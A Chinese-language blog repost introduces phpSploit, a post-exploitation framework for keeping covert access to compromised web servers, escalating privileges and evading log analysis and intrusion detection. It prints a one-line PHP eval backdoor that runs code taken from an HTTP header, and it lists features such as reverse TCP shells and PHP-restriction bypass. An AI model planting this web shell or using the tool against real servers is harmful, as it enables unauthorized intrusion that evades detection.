1. 程式人生 > >phpSploit後滲透利用框架介紹

phpSploit後滲透利用框架介紹

系統 文本編輯 交互式 $_server 一個 數據 保存 之間 插件

今天在freebuf 上看到有一篇介紹PhpSploit的遠程控制框架的文章覺得不錯,就把文章超過來了。方便以後自己查找。
phpsploit可以幫助攻擊者在客戶端與Web服務器端之間建立隱蔽性極強的交互式鏈接(類似Shell)。簡而言之,這是一款後滲透利用工具,它能夠讓攻擊者與目標主機(例如被入侵的Web服務器)維持訪問鏈接,並實現提權操作。
技術分享圖片
概述
該工具會對標準客戶端請求以及Web服務器相關請求的HTTP頭數據進行混淆處理,並利用一個小型的多態後門來實現隱蔽通信:

<? @eval($_SERVER[‘HTTP_PHPSPL01T‘]) ?>
功能介紹
效率高:

  1. 提供了超過20款自動化後滲透利用工具;

  2. 運行命令、瀏覽文件系統、繞過PHP安全限制;

  3. 在目標客戶端與攻擊者端之間實現文件的上傳和下載;

  4. 通過本地文本編輯器編輯遠程文件;

  5. 在目標系統中運行SQL語句;

  6. 生成反向TCP Shell;

隱蔽性強:

  1. 專為偏執狂設計;

  2. 日誌分析以及NIDS簽名檢測機制幾乎無法檢測到它;

  3. 繞過安全模式以及常見PHP安全限制;

  4. 通信信息隱藏在HTTP頭中;

  5. 加載的Payload經過了混淆處理以繞過NIDS;

  6. 支持http/https/socks4/socks5代理;

使用便捷:

  1. 跨平臺;

  2. 強大的界面,完整的命令支持;

  3. 提供了會話保存/加載功能;

  4. 支持大型Payload,支持多重請求;

  5. 提供了強大的、高度可配置的設置引擎;

  6. 每一個設置(例如用戶代理)都有多態模式;

  7. 提供了完整的插件開發API;

支持的平臺(攻擊者端)

  1. GNU/Linux

  2. MacOS X

支持的平臺(目標用戶端)

  1. GNU/Linux

  2. BSDLike

  3. MacOS X

  4. WindowsNT

下載地址 https://github.com/nil0x42/phpsploit

phpSploit後滲透利用框架介紹